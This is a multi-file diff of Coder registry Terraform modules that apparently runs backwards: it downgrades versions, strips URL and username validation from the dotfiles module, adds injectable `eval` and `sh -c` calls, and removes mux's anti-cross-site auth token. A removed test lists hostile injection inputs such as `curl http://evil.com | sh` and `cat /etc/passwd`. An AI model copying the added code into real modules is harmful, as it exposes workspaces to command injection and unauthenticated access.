-  version         = "4.7.5"
+  version         = "4.7.4"
   agent_id        = coder_agent.main.id
   workdir         = "/home/coder/project"
   enable_boundary = true
@@ -68,7 +68,7 @@ For tasks integration with AI Bridge, add `enable_aibridge = true` to the [Usage
 ```tf
 module "claude-code" {
   source          = "registry.coder.com/coder/claude-code/coder"
-  version         = "4.7.5"
+  version         = "4.7.4"
   agent_id        = coder_agent.main.id
   workdir         = "/home/coder/project"
   enable_aibridge = true
@@ -97,7 +97,7 @@ data "coder_task" "me" {}
 
 module "claude-code" {
   source    = "registry.coder.com/coder/claude-code/coder"
-  version   = "4.7.5"
+  version   = "4.7.4"
   agent_id  = coder_agent.main.id
   workdir   = "/home/coder/project"
   ai_prompt = data.coder_task.me.prompt
@@ -120,7 +120,7 @@ This example shows additional configuration options for version pinning, custom
 ```tf
 module "claude-code" {
   source   = "registry.coder.com/coder/claude-code/coder"
-  version  = "4.7.5"
+  version  = "4.7.4"
   agent_id = coder_agent.main.id
   workdir  = "/home/coder/project"
 
@@ -176,7 +176,7 @@ Run and configure Claude Code as a standalone CLI in your workspace.
 ```tf
 module "claude-code" {
   source              = "registry.coder.com/coder/claude-code/coder"
-  version             = "4.7.5"
+  version             = "4.7.4"
   agent_id            = coder_agent.main.id
   workdir             = "/home/coder/project"
   install_claude_code = true
@@ -198,7 +198,7 @@ variable "claude_code_oauth_token" {
 
 module "claude-code" {
   source                  = "registry.coder.com/coder/claude-code/coder"
-  version                 = "4.7.5"
+  version                 = "4.7.4"
   agent_id                = coder_agent.main.id
   workdir                 = "/home/coder/project"
   claude_code_oauth_token = var.claude_code_oauth_token
@@ -271,7 +271,7 @@ resource "coder_env" "bedrock_api_key" {
 
 module "claude-code" {
   source   = "registry.coder.com/coder/claude-code/coder"
-  version  = "4.7.5"
+  version  = "4.7.4"
   agent_id = coder_agent.main.id
   workdir  = "/home/coder/project"
   model    = "global.anthropic.claude-sonnet-4-5-20250929-v1:0"
@@ -328,7 +328,7 @@ resource "coder_env" "google_application_credentials" {
 
 module "claude-code" {
   source   = "registry.coder.com/coder/claude-code/coder"
-  version  = "4.7.5"
+  version  = "4.7.4"
   agent_id = coder_agent.main.id
   workdir  = "/home/coder/project"
   model    = "claude-sonnet-4@20250514"

registry/coder/modules/claude-code/main.tf

@@ -208,11 +208,6 @@ variable "claude_binary_path" {
   type        = string
   description = "Directory where the Claude Code binary is located. Use this if Claude is pre-installed or installed outside the module to a non-default location."
   default     = "$HOME/.local/bin"
-
-  validation {
-    condition     = var.claude_binary_path == "$HOME/.local/bin" || !var.install_claude_code
-    error_message = "Custom claude_binary_path can only be used when install_claude_code is false. The official installer always installs to $HOME/.local/bin and does not support custom paths."
-  }
 }
 
 variable "install_via_npm" {
@@ -295,6 +290,18 @@ resource "coder_env" "disable_autoupdater" {
   value    = "1"
 }
 
+resource "coder_env" "claude_binary_path" {
+  agent_id = var.agent_id
+  name     = "PATH"
+  value    = "${var.claude_binary_path}:$PATH"
+
+  lifecycle {
+    precondition {
+      condition     = var.claude_binary_path == "$HOME/.local/bin" || !var.install_claude_code
+      error_message = "Custom claude_binary_path can only be used when install_claude_code is false. The official installer and npm both install to fixed locations."
+    }
+  }
+}
 
 resource "coder_env" "anthropic_model" {
   count    = var.model != "" ? 1 : 0
@@ -375,27 +382,26 @@ module "agentapi" {
   pre_install_script   = var.pre_install_script
   post_install_script  = var.post_install_script
   start_script         = <<-EOT
-    #!/bin/bash
-    set -o errexit
-    set -o pipefail
-    echo -n '${base64encode(local.start_script)}' | base64 -d > /tmp/start.sh
-    chmod +x /tmp/start.sh
+     #!/bin/bash
+     set -o errexit
+     set -o pipefail
+     echo -n '${base64encode(local.start_script)}' | base64 -d > /tmp/start.sh
+     chmod +x /tmp/start.sh
 
-    ARG_RESUME_SESSION_ID='${var.resume_session_id}' \
-    ARG_CONTINUE='${var.continue}' \
-    ARG_DANGEROUSLY_SKIP_PERMISSIONS='${var.dangerously_skip_permissions}' \
-    ARG_PERMISSION_MODE='${var.permission_mode}' \
-    ARG_WORKDIR='${local.workdir}' \
-    ARG_AI_PROMPT='${base64encode(var.ai_prompt)}' \
-    ARG_REPORT_TASKS='${var.report_tasks}' \
-    ARG_ENABLE_BOUNDARY='${var.enable_boundary}' \
-    ARG_BOUNDARY_VERSION='${var.boundary_version}' \
-    ARG_COMPILE_FROM_SOURCE='${var.compile_boundary_from_source}' \
-    ARG_USE_BOUNDARY_DIRECTLY='${var.use_boundary_directly}' \
-    ARG_CODER_HOST='${local.coder_host}' \
-    ARG_CLAUDE_BINARY_PATH='${var.claude_binary_path}' \
-    /tmp/start.sh
-  EOT
+     ARG_RESUME_SESSION_ID='${var.resume_session_id}' \
+     ARG_CONTINUE='${var.continue}' \
+     ARG_DANGEROUSLY_SKIP_PERMISSIONS='${var.dangerously_skip_permissions}' \
+     ARG_PERMISSION_MODE='${var.permission_mode}' \
+     ARG_WORKDIR='${local.workdir}' \
+     ARG_AI_PROMPT='${base64encode(var.ai_prompt)}' \
+     ARG_REPORT_TASKS='${var.report_tasks}' \
+     ARG_ENABLE_BOUNDARY='${var.enable_boundary}' \
+     ARG_BOUNDARY_VERSION='${var.boundary_version}' \
+     ARG_COMPILE_FROM_SOURCE='${var.compile_boundary_from_source}' \
+     ARG_USE_BOUNDARY_DIRECTLY='${var.use_boundary_directly}' \
+     ARG_CODER_HOST='${local.coder_host}' \
+     /tmp/start.sh
+   EOT
 
   install_script = <<-EOT
     #!/bin/bash

registry/coder/modules/claude-code/scripts/install.sh

@@ -12,8 +12,6 @@ ARG_CLAUDE_CODE_VERSION=${ARG_CLAUDE_CODE_VERSION:-}
 ARG_WORKDIR=${ARG_WORKDIR:-"$HOME"}
 ARG_INSTALL_CLAUDE_CODE=${ARG_INSTALL_CLAUDE_CODE:-}
 ARG_CLAUDE_BINARY_PATH=${ARG_CLAUDE_BINARY_PATH:-"$HOME/.local/bin"}
-ARG_CLAUDE_BINARY_PATH="${ARG_CLAUDE_BINARY_PATH/#\~/$HOME}"
-ARG_CLAUDE_BINARY_PATH="${ARG_CLAUDE_BINARY_PATH//\$HOME/$HOME}"
 ARG_INSTALL_VIA_NPM=${ARG_INSTALL_VIA_NPM:-false}
 ARG_REPORT_TASKS=${ARG_REPORT_TASKS:-true}
 ARG_MCP_APP_STATUS_SLUG=${ARG_MCP_APP_STATUS_SLUG:-}
@@ -23,8 +21,6 @@ ARG_ALLOWED_TOOLS=${ARG_ALLOWED_TOOLS:-}
 ARG_DISALLOWED_TOOLS=${ARG_DISALLOWED_TOOLS:-}
 ARG_ENABLE_AIBRIDGE=${ARG_ENABLE_AIBRIDGE:-false}
 
-export PATH="$ARG_CLAUDE_BINARY_PATH:$PATH"
-
 echo "--------------------------------"
 
 printf "ARG_CLAUDE_CODE_VERSION: %s\n" "$ARG_CLAUDE_CODE_VERSION"
@@ -55,51 +51,39 @@ function add_mcp_servers() {
   done < <(echo "$mcp_json" | jq -r '.mcpServers | to_entries[] | .key, (.value | @json)')
 }
 
-function add_path_to_shell_profiles() {
-  local path_dir="$1"
-
-  for profile in "$HOME/.profile" "$HOME/.bash_profile" "$HOME/.bashrc" "$HOME/.zprofile" "$HOME/.zshrc"; do
-    if [ -f "$profile" ]; then
-      if ! grep -q "$path_dir" "$profile" 2> /dev/null; then
-        echo "export PATH=\"\$PATH:$path_dir\"" >> "$profile"
-        echo "Added $path_dir to $profile"
-      fi
-    fi
-  done
-
-  local fish_config="$HOME/.config/fish/config.fish"
-  if [ -f "$fish_config" ]; then
-    if ! grep -q "$path_dir" "$fish_config" 2> /dev/null; then
-      echo "fish_add_path $path_dir" >> "$fish_config"
-      echo "Added $path_dir to $fish_config"
-    fi
-  fi
-}
-
 function ensure_claude_in_path() {
-  local CLAUDE_BIN=""
-  if command -v claude > /dev/null 2>&1; then
-    CLAUDE_BIN=$(command -v claude)
-  elif [ -x "$ARG_CLAUDE_BINARY_PATH/claude" ]; then
-    CLAUDE_BIN="$ARG_CLAUDE_BINARY_PATH/claude"
-  elif [ -x "$HOME/.local/bin/claude" ]; then
-    CLAUDE_BIN="$HOME/.local/bin/claude"
-  fi
-
-  if [ -z "$CLAUDE_BIN" ] || [ ! -x "$CLAUDE_BIN" ]; then
-    echo "Warning: Could not find claude binary"
+  if [ -z "${CODER_SCRIPT_BIN_DIR:-}" ]; then
+    echo "CODER_SCRIPT_BIN_DIR not set, skipping PATH setup"
     return
   fi
 
-  local CLAUDE_DIR
-  CLAUDE_DIR=$(dirname "$CLAUDE_BIN")
+  if [ ! -e "$CODER_SCRIPT_BIN_DIR/claude" ]; then
+    local CLAUDE_BIN=""
+    if command -v claude > /dev/null 2>&1; then
+      CLAUDE_BIN=$(command -v claude)
+    elif [ -x "$ARG_CLAUDE_BINARY_PATH/claude" ]; then
+      CLAUDE_BIN="$ARG_CLAUDE_BINARY_PATH/claude"
+    elif [ -x "$HOME/.local/bin/claude" ]; then
+      CLAUDE_BIN="$HOME/.local/bin/claude"
+    fi
 
-  if [ -n "${CODER_SCRIPT_BIN_DIR:-}" ] && [ ! -e "$CODER_SCRIPT_BIN_DIR/claude" ]; then
-    ln -s "$CLAUDE_BIN" "$CODER_SCRIPT_BIN_DIR/claude"
-    echo "Created symlink: $CODER_SCRIPT_BIN_DIR/claude -> $CLAUDE_BIN"
+    if [ -n "$CLAUDE_BIN" ] && [ -x "$CLAUDE_BIN" ]; then
+      ln -s "$CLAUDE_BIN" "$CODER_SCRIPT_BIN_DIR/claude"
+      echo "Created symlink: $CODER_SCRIPT_BIN_DIR/claude -> $CLAUDE_BIN"
+    else
+      echo "Warning: Could not find claude binary to symlink"
+    fi
+  else
+    echo "Claude already available in CODER_SCRIPT_BIN_DIR"
   fi
 
-  add_path_to_shell_profiles "$CLAUDE_DIR"
+  local marker="# Added by claude-code module"
+  for profile in "$HOME/.bashrc" "$HOME/.zshrc" "$HOME/.profile"; do
+    if [ -f "$profile" ] && ! grep -q "$marker" "$profile" 2> /dev/null; then
+      printf "\n%s\nexport PATH=\"%s:\$PATH\"\n" "$marker" "$CODER_SCRIPT_BIN_DIR" >> "$profile"
+      echo "Added $CODER_SCRIPT_BIN_DIR to PATH in $profile"
+    fi
+  done
 }
 
 function install_claude_code_cli() {

registry/coder/modules/claude-code/scripts/start.sh

@@ -2,12 +2,6 @@
 
 set -euo pipefail
 
-ARG_CLAUDE_BINARY_PATH=${ARG_CLAUDE_BINARY_PATH:-"$HOME/.local/bin"}
-ARG_CLAUDE_BINARY_PATH="${ARG_CLAUDE_BINARY_PATH/#\~/$HOME}"
-ARG_CLAUDE_BINARY_PATH="${ARG_CLAUDE_BINARY_PATH//\$HOME/$HOME}"
-
-export PATH="$ARG_CLAUDE_BINARY_PATH:$PATH"
-
 command_exists() {
   command -v "$1" > /dev/null 2>&1
 }

registry/coder/modules/cursor/README.md

@@ -16,7 +16,7 @@ Uses the [Coder Remote VS Code Extension](https://github.com/coder/vscode-coder)
 module "cursor" {
   count    = data.coder_workspace.me.start_count
   source   = "registry.coder.com/coder/cursor/coder"
-  version  = "1.4.1"
+  version  = "1.4.0"
   agent_id = coder_agent.main.id
 }
 ```
@@ -29,7 +29,7 @@ module "cursor" {
 module "cursor" {
   count    = data.coder_workspace.me.start_count
   source   = "registry.coder.com/coder/cursor/coder"
-  version  = "1.4.1"
+  version  = "1.4.0"
   agent_id = coder_agent.main.id
   folder   = "/home/coder/project"
 }
@@ -45,7 +45,7 @@ The following example configures Cursor to use the GitHub MCP server with authen
 module "cursor" {
   count    = data.coder_workspace.me.start_count
   source   = "registry.coder.com/coder/cursor/coder"
-  version  = "1.4.1"
+  version  = "1.4.0"
   agent_id = coder_agent.main.id
   folder   = "/home/coder/project"
   mcp = jsonencode({

registry/coder/modules/cursor/main.tf

@@ -66,7 +66,7 @@ locals {
 
 module "vscode-desktop-core" {
   source  = "registry.coder.com/coder/vscode-desktop-core/coder"
-  version = "1.0.2"
+  version = "1.0.0"
 
   agent_id = var.agent_id
 

registry/coder/modules/dotfiles/README.md

@@ -18,7 +18,7 @@ Under the hood, this module uses the [coder dotfiles](https://coder.com/docs/v2/
 module "dotfiles" {
   count    = data.coder_workspace.me.start_count
   source   = "registry.coder.com/coder/dotfiles/coder"
-  version  = "1.3.0"
+  version  = "1.2.3"
   agent_id = coder_agent.example.id
 }
 ```
@@ -31,7 +31,7 @@ module "dotfiles" {
 module "dotfiles" {
   count    = data.coder_workspace.me.start_count
   source   = "registry.coder.com/coder/dotfiles/coder"
-  version  = "1.3.0"
+  version  = "1.2.3"
   agent_id = coder_agent.example.id
 }
 ```
@@ -42,7 +42,7 @@ module "dotfiles" {
 module "dotfiles" {
   count    = data.coder_workspace.me.start_count
   source   = "registry.coder.com/coder/dotfiles/coder"
-  version  = "1.3.0"
+  version  = "1.2.3"
   agent_id = coder_agent.example.id
   user     = "root"
 }
@@ -54,14 +54,14 @@ module "dotfiles" {
 module "dotfiles" {
   count    = data.coder_workspace.me.start_count
   source   = "registry.coder.com/coder/dotfiles/coder"
-  version  = "1.3.0"
+  version  = "1.2.3"
   agent_id = coder_agent.example.id
 }
 
 module "dotfiles-root" {
   count        = data.coder_workspace.me.start_count
   source       = "registry.coder.com/coder/dotfiles/coder"
-  version      = "1.3.0"
+  version      = "1.2.3"
   agent_id     = coder_agent.example.id
   user         = "root"
   dotfiles_uri = module.dotfiles.dotfiles_uri
@@ -76,7 +76,7 @@ You can set a default dotfiles repository for all users by setting the `default_
 module "dotfiles" {
   count                = data.coder_workspace.me.start_count
   source               = "registry.coder.com/coder/dotfiles/coder"
-  version              = "1.3.0"
+  version              = "1.2.3"
   agent_id             = coder_agent.example.id
   default_dotfiles_uri = "https://github.com/coder/dotfiles"
 }

registry/coder/modules/dotfiles/main.test.ts

@@ -12,47 +12,20 @@ describe("dotfiles", async () => {
     agent_id: "foo",
   });
 
-  it("default output is empty string", async () => {
+  it("default output", async () => {
     const state = await runTerraformApply(import.meta.dir, {
       agent_id: "foo",
     });
     expect(state.outputs.dotfiles_uri.value).toBe("");
   });
 
-  it("accepts valid git URL formats", async () => {
-    const validUrls = [
-      "https://github.com/coder/dotfiles",
-      "https://github.com/coder/dotfiles.git",
-      "git@github.com:coder/dotfiles.git",
-      "git://github.com/coder/dotfiles.git",
-      "ssh://git@github.com/coder/dotfiles.git",
-    ];
-    for (const url of validUrls) {
-      const state = await runTerraformApply(import.meta.dir, {
-        agent_id: "foo",
-        dotfiles_uri: url,
-      });
-      expect(state.outputs.dotfiles_uri.value).toBe(url);
-    }
-  });
-
-  it("rejects invalid or malicious URLs", async () => {
-    const invalidUrls = [
-      "https://github.com/user/repo; curl http://evil.com | sh",
-      "https://github.com/$(whoami)/repo",
-      "https://github.com/`id`/repo",
-      "https://github.com/user/repo|cat /etc/passwd",
-      "file:///etc/passwd",
-      "not-a-valid-url",
-    ];
-    for (const url of invalidUrls) {
-      await expect(
-        runTerraformApply(import.meta.dir, {
-          agent_id: "foo",
-          dotfiles_uri: url,
-        }),
-      ).rejects.toThrow();
-    }
+  it("set a default dotfiles_uri", async () => {
+    const default_dotfiles_uri = "foo";
+    const state = await runTerraformApply(import.meta.dir, {
+      agent_id: "foo",
+      default_dotfiles_uri,
+    });
+    expect(state.outputs.dotfiles_uri.value).toBe(default_dotfiles_uri);
   });
 
   it("set custom order for coder_parameter", async () => {

registry/coder/modules/dotfiles/main.tf

@@ -36,40 +36,19 @@ variable "default_dotfiles_uri" {
   type        = string
   description = "The default dotfiles URI if the workspace user does not provide one"
   default     = ""
-
-  validation {
-    condition = (
-      var.default_dotfiles_uri == "" ||
-      can(regex("^(https?://|ssh://|git@|git://)[a-zA-Z0-9._/:@-]+$", var.default_dotfiles_uri))
-    )
-    error_message = "Must be a valid dotfiles repository URL (https, git@, or git://) without special characters."
-  }
 }
 
 variable "dotfiles_uri" {
   type        = string
   description = "The URL to a dotfiles repository. (optional, when set, the user isn't prompted for their dotfiles)"
-  default     = null
 
-  validation {
-    condition = (
-      var.dotfiles_uri == null ||
-      var.dotfiles_uri == "" ||
-      can(regex("^(https?://|ssh://|git@|git://)[a-zA-Z0-9._/:@-]+$", var.dotfiles_uri))
-    )
-    error_message = "Must be a valid dotfiles repository URL (https, git@, or git://) without special characters."
-  }
+  default = null
 }
 
 variable "user" {
   type        = string
   description = "The name of the user to apply the dotfiles to. (optional, applies to the current user by default)"
   default     = null
-
-  validation {
-    condition     = var.user == null || can(regex("^[a-zA-Z_][a-zA-Z0-9_-]*$", var.user))
-    error_message = "Must be a valid username without special characters."
-  }
 }
 
 variable "coder_parameter_order" {
@@ -84,12 +63,6 @@ variable "manual_update" {
   default     = false
 }
 
-variable "post_clone_script" {
-  description = "Custom script to run after applying dotfiles. Runs every time, even if dotfiles were already applied."
-  type        = string
-  default     = null
-}
-
 data "coder_parameter" "dotfiles_uri" {
   count        = var.dotfiles_uri == null ? 1 : 0
   type         = "string"
@@ -100,25 +73,18 @@ data "coder_parameter" "dotfiles_uri" {
   description  = var.description
   mutable      = true
   icon         = "/icon/dotfiles.svg"
-
-  validation {
-    regex = "^$|^(https?://|ssh://|git@|git://)[a-zA-Z0-9._/:@-]+$"
-    error = "Must be a valid dotfiles repository URL (https, git@, or git://) without special characters."
-  }
 }
 
 locals {
-  dotfiles_uri              = var.dotfiles_uri != null ? var.dotfiles_uri : data.coder_parameter.dotfiles_uri[0].value
-  user                      = var.user != null ? var.user : ""
-  encoded_post_clone_script = var.post_clone_script != null ? base64encode(var.post_clone_script) : ""
+  dotfiles_uri = var.dotfiles_uri != null ? var.dotfiles_uri : data.coder_parameter.dotfiles_uri[0].value
+  user         = var.user != null ? var.user : ""
 }
 
 resource "coder_script" "dotfiles" {
   agent_id = var.agent_id
   script = templatefile("${path.module}/run.sh", {
     DOTFILES_URI : local.dotfiles_uri,
-    DOTFILES_USER : local.user,
-    POST_CLONE_SCRIPT : local.encoded_post_clone_script
+    DOTFILES_USER : local.user
   })
   display_name = "Dotfiles"
   icon         = "/icon/dotfiles.svg"
@@ -135,8 +101,7 @@ resource "coder_app" "dotfiles" {
   group        = var.group
   command = templatefile("${path.module}/run.sh", {
     DOTFILES_URI : local.dotfiles_uri,
-    DOTFILES_USER : local.user,
-    POST_CLONE_SCRIPT : local.encoded_post_clone_script
+    DOTFILES_USER : local.user
   })
 }
 

registry/coder/modules/dotfiles/run.sh

@@ -5,19 +5,6 @@ set -euo pipefail
 DOTFILES_URI="${DOTFILES_URI}"
 DOTFILES_USER="${DOTFILES_USER}"
 
-# Validate DOTFILES_URI to prevent command injection (defense in depth)
-if [ -n "$DOTFILES_URI" ]; then
-  # shellcheck disable=SC2250
-  if [[ "$DOTFILES_URI" =~ [^a-zA-Z0-9._/:@-] ]]; then
-    echo "ERROR: DOTFILES_URI contains invalid characters" >&2
-    exit 1
-  fi
-  if ! [[ "$DOTFILES_URI" =~ ^(https?://|ssh://|git@|git://) ]]; then
-    echo "ERROR: DOTFILES_URI must be a valid repository URL (https://, http://, ssh://, git@, or git://)" >&2
-    exit 1
-  fi
-fi
-
 # shellcheck disable=SC2157
 if [ -n "$${DOTFILES_URI// }" ]; then
   if [ -z "$DOTFILES_USER" ]; then
@@ -29,28 +16,12 @@ if [ -n "$${DOTFILES_URI// }" ]; then
   if [ "$DOTFILES_USER" = "$USER" ]; then
     coder dotfiles "$DOTFILES_URI" -y 2>&1 | tee ~/.dotfiles.log
   else
-    if command -v getent > /dev/null 2>&1; then
-      DOTFILES_USER_HOME=$(getent passwd "$DOTFILES_USER" | cut -d: -f6)
-    else
-      DOTFILES_USER_HOME=$(awk -F: -v user="$DOTFILES_USER" '$1 == user {print $6}' /etc/passwd)
-    fi
-    if [ -z "$DOTFILES_USER_HOME" ]; then
-      echo "ERROR: Could not determine home directory for user $DOTFILES_USER" >&2
-      exit 1
-    fi
+    # The `eval echo ~"$DOTFILES_USER"` part is used to dynamically get the home directory of the user, see https://superuser.com/a/484280
+    # eval echo ~coder -> "/home/coder"
+    # eval echo ~root  -> "/root"
 
-    CODER_BIN=$(command -v coder)
-    sudo -u "$DOTFILES_USER" "$CODER_BIN" dotfiles "$DOTFILES_URI" -y 2>&1 | tee "$DOTFILES_USER_HOME/.dotfiles.log"
+    CODER_BIN=$(which coder)
+    DOTFILES_USER_HOME=$(eval echo ~"$DOTFILES_USER")
+    sudo -u "$DOTFILES_USER" sh -c "'$CODER_BIN' dotfiles '$DOTFILES_URI' -y 2>&1 | tee '$DOTFILES_USER_HOME'/.dotfiles.log"
   fi
 fi
-
-POST_CLONE_SCRIPT="${POST_CLONE_SCRIPT}"
-
-if [ -n "$POST_CLONE_SCRIPT" ]; then
-  echo "Running post-clone script..."
-  POST_CLONE_TMP=$(mktemp)
-  echo "$POST_CLONE_SCRIPT" | base64 -d > "$POST_CLONE_TMP"
-  chmod +x "$POST_CLONE_TMP"
-  $POST_CLONE_TMP
-  rm "$POST_CLONE_TMP"
-fi

registry/coder/modules/jetbrains/README.md

@@ -42,7 +42,7 @@ module "jetbrains" {
   version  = "1.3.0"
   agent_id = coder_agent.main.id
   folder   = "/home/coder/project"
-  default  = ["PY", "IU"] # Pre-configure PyCharm and IntelliJ IDEA
+  default  = ["PY", "IU"] # Pre-configure GoLand and IntelliJ IDEA
 }
 ```
 

registry/coder/modules/kasmvnc/README.md

@@ -14,7 +14,7 @@ Automatically install [KasmVNC](https://kasmweb.com/kasmvnc) in a workspace, and
 module "kasmvnc" {
   count               = data.coder_workspace.me.start_count
   source              = "registry.coder.com/coder/kasmvnc/coder"
-  version             = "1.3.0"
+  version             = "1.2.7"
   agent_id            = coder_agent.example.id
   desktop_environment = "xfce"
   subdomain           = true

registry/coder/modules/kasmvnc/main.tf

@@ -54,15 +54,6 @@ variable "subdomain" {
   description = "Is subdomain sharing enabled in your cluster?"
 }
 
-variable "share" {
-  type    = string
-  default = "owner"
-  validation {
-    condition     = var.share == "owner" || var.share == "authenticated" || var.share == "public"
-    error_message = "Incorrect value. Please set either 'owner', 'authenticated', or 'public'."
-  }
-}
-
 resource "coder_script" "kasm_vnc" {
   agent_id     = var.agent_id
   display_name = "KasmVNC"
@@ -84,7 +75,7 @@ resource "coder_app" "kasm_vnc" {
   url          = "http://localhost:${var.port}"
   icon         = "/icon/kasmvnc.svg"
   subdomain    = var.subdomain
-  share        = var.share
+  share        = "owner"
   order        = var.order
   group        = var.group
 

registry/coder/modules/kiro/README.md

@@ -18,7 +18,7 @@ Uses the [Coder Remote VS Code Extension](https://github.com/coder/vscode-coder)
 module "kiro" {
   count    = data.coder_workspace.me.start_count
   source   = "registry.coder.com/coder/kiro/coder"
-  version  = "1.2.1"
+  version  = "1.2.0"
   agent_id = coder_agent.main.id
 }
 ```
@@ -31,7 +31,7 @@ module "kiro" {
 module "kiro" {
   count    = data.coder_workspace.me.start_count
   source   = "registry.coder.com/coder/kiro/coder"
-  version  = "1.2.1"
+  version  = "1.2.0"
   agent_id = coder_agent.main.id
   folder   = "/home/coder/project"
 }
@@ -47,7 +47,7 @@ The following example configures Kiro to use the GitHub MCP server with authenti
 module "kiro" {
   count    = data.coder_workspace.me.start_count
   source   = "registry.coder.com/coder/kiro/coder"
-  version  = "1.2.1"
+  version  = "1.2.0"
   agent_id = coder_agent.main.id
   folder   = "/home/coder/project"
   mcp = jsonencode({

registry/coder/modules/kiro/main.tf

@@ -53,7 +53,7 @@ locals {
 
 module "vscode-desktop-core" {
   source  = "registry.coder.com/coder/vscode-desktop-core/coder"
-  version = "1.0.2"
+  version = "1.0.0"
 
   agent_id = var.agent_id
 

registry/coder/modules/mux/README.md

@@ -14,7 +14,7 @@ Automatically install and run [Mux](https://github.com/coder/mux) in a Coder wor
 module "mux" {
   count    = data.coder_workspace.me.start_count
   source   = "registry.coder.com/coder/mux/coder"
-  version  = "1.1.0"
+  version  = "1.0.8"
   agent_id = coder_agent.main.id
 }
 ```
@@ -37,7 +37,7 @@ module "mux" {
 module "mux" {
   count    = data.coder_workspace.me.start_count
   source   = "registry.coder.com/coder/mux/coder"
-  version  = "1.1.0"
+  version  = "1.0.8"
   agent_id = coder_agent.main.id
 }
 ```
@@ -48,7 +48,7 @@ module "mux" {
 module "mux" {
   count    = data.coder_workspace.me.start_count
   source   = "registry.coder.com/coder/mux/coder"
-  version  = "1.1.0"
+  version  = "1.0.8"
   agent_id = coder_agent.main.id
   # Default is "latest"; set to a specific version to pin
   install_version = "0.4.0"
@@ -63,7 +63,7 @@ Start Mux with `mux server --add-project /path/to/project`:
 module "mux" {
   count       = data.coder_workspace.me.start_count
   source      = "registry.coder.com/coder/mux/coder"
-  version     = "1.1.0"
+  version     = "1.0.8"
   agent_id    = coder_agent.main.id
   add-project = "/path/to/project"
 }
@@ -75,7 +75,7 @@ module "mux" {
 module "mux" {
   count    = data.coder_workspace.me.start_count
   source   = "registry.coder.com/coder/mux/coder"
-  version  = "1.1.0"
+  version  = "1.0.8"
   agent_id = coder_agent.main.id
   port     = 8080
 }
@@ -89,7 +89,7 @@ Run an existing copy of Mux if found, otherwise install from npm:
 module "mux" {
   count      = data.coder_workspace.me.start_count
   source     = "registry.coder.com/coder/mux/coder"
-  version    = "1.1.0"
+  version    = "1.0.8"
   agent_id   = coder_agent.main.id
   use_cached = true
 }
@@ -103,7 +103,7 @@ Run without installing from the network (requires Mux to be pre-installed):
 module "mux" {
   count    = data.coder_workspace.me.start_count
   source   = "registry.coder.com/coder/mux/coder"
-  version  = "1.1.0"
+  version  = "1.0.8"
   agent_id = coder_agent.main.id
   install  = false
 }

registry/coder/modules/mux/main.tf

@@ -7,10 +7,6 @@ terraform {
       source  = "coder/coder"
       version = ">= 2.5"
     }
-    random = {
-      source  = "hashicorp/random"
-      version = ">= 3.0"
-    }
   }
 }
 
@@ -117,22 +113,6 @@ variable "open_in" {
   }
 }
 
-# Per-module auth token for cross-site request protection.
-# We pass this token into each mux process at launch time (process-scoped env)
-# and include it in the app URL query string (?token=...).
-#
-# Why process-scoped env instead of a shared coder_env value:
-# multiple mux module instances can target the same agent (different slug/port).
-# A single global MUX_SERVER_AUTH_TOKEN env key would cause collisions.
-resource "random_password" "mux_auth_token" {
-  length  = 64
-  special = false
-}
-
-locals {
-  mux_auth_token = random_password.mux_auth_token.result
-}
-
 resource "coder_script" "mux" {
   agent_id     = var.agent_id
   display_name = var.display_name
@@ -145,7 +125,6 @@ resource "coder_script" "mux" {
     INSTALL_PREFIX : var.install_prefix,
     OFFLINE : !var.install,
     USE_CACHED : var.use_cached,
-    AUTH_TOKEN : local.mux_auth_token,
   })
   run_on_start = true
 
@@ -161,7 +140,7 @@ resource "coder_app" "mux" {
   agent_id     = var.agent_id
   slug         = var.slug
   display_name = var.display_name
-  url          = "http://localhost:${var.port}?token=${local.mux_auth_token}"
+  url          = "http://localhost:${var.port}"
   icon         = "/icon/mux.svg"
   subdomain    = var.subdomain
   share        = var.share
@@ -175,3 +154,5 @@ resource "coder_app" "mux" {
     threshold = 6
   }
 }
+
+

registry/coder/modules/mux/mux.tftest.hcl

@@ -20,10 +20,8 @@ run "install_false_and_use_cached_conflict" {
   ]
 }
 
-# Needs command = apply because the URL contains random_password.result,
-# which is unknown during plan.
 run "custom_port" {
-  command = apply
+  command = plan
 
   variables {
     agent_id = "foo"
@@ -31,51 +29,8 @@ run "custom_port" {
   }
 
   assert {
-    condition     = startswith(resource.coder_app.mux.url, "http://localhost:8080?token=")
-    error_message = "coder_app URL must use the configured port and include auth token"
-  }
-
-  assert {
-    condition     = trimprefix(resource.coder_app.mux.url, "http://localhost:8080?token=") == random_password.mux_auth_token.result
-    error_message = "URL token must match the generated auth token"
-  }
-}
-
-# Needs command = apply because random_password.result is unknown during plan.
-run "auth_token_in_server_script" {
-  command = apply
-
-  variables {
-    agent_id = "foo"
-  }
-
-  assert {
-    condition     = strcontains(resource.coder_script.mux.script, "MUX_SERVER_AUTH_TOKEN=")
-    error_message = "mux launch script must set MUX_SERVER_AUTH_TOKEN"
-  }
-
-  assert {
-    condition     = strcontains(resource.coder_script.mux.script, random_password.mux_auth_token.result)
-    error_message = "mux launch script must use the generated auth token"
-  }
-}
-
-# Needs command = apply because random_password.result is unknown during plan.
-run "auth_token_in_url" {
-  command = apply
-
-  variables {
-    agent_id = "foo"
-  }
-
-  assert {
-    condition     = startswith(resource.coder_app.mux.url, "http://localhost:4000?token=")
-    error_message = "coder_app URL must include auth token query parameter"
-  }
-
-  assert {
-    condition     = trimprefix(resource.coder_app.mux.url, "http://localhost:4000?token=") == random_password.mux_auth_token.result
-    error_message = "URL token must match the generated auth token"
+    condition     = resource.coder_app.mux.url == "http://localhost:8080"
+    error_message = "coder_app URL must use the configured port"
   }
 }
 
@@ -107,3 +62,5 @@ run "use_cached_only_success" {
     use_cached = true
   }
 }
+
+

registry/coder/modules/mux/run.sh

@@ -9,9 +9,7 @@ function run_mux() {
   rm -f "$HOME/.mux/server.lock"
 
   local port_value
-  local auth_token_value
   port_value="${PORT}"
-  auth_token_value="${AUTH_TOKEN}"
   if [ -z "$port_value" ]; then
     port_value="4000"
   fi
@@ -22,7 +20,7 @@ function run_mux() {
   fi
   echo "🚀 Starting mux server on port $port_value..."
   echo "Check logs at ${LOG_PATH}!"
-  MUX_SERVER_AUTH_TOKEN="$auth_token_value" PORT="$port_value" "$MUX_BINARY" "$@" > "${LOG_PATH}" 2>&1 &
+  PORT="$port_value" "$MUX_BINARY" "$@" > "${LOG_PATH}" 2>&1 &
 }
 
 # Check if mux is already installed for offline mode

registry/coder/modules/vscode-desktop-core/README.md

@@ -16,15 +16,15 @@ The VSCode Desktop Core module is a building block for modules that need to expo
 ```tf
 module "vscode-desktop-core" {
   source  = "registry.coder.com/coder/vscode-desktop-core/coder"
-  version = "1.0.2"
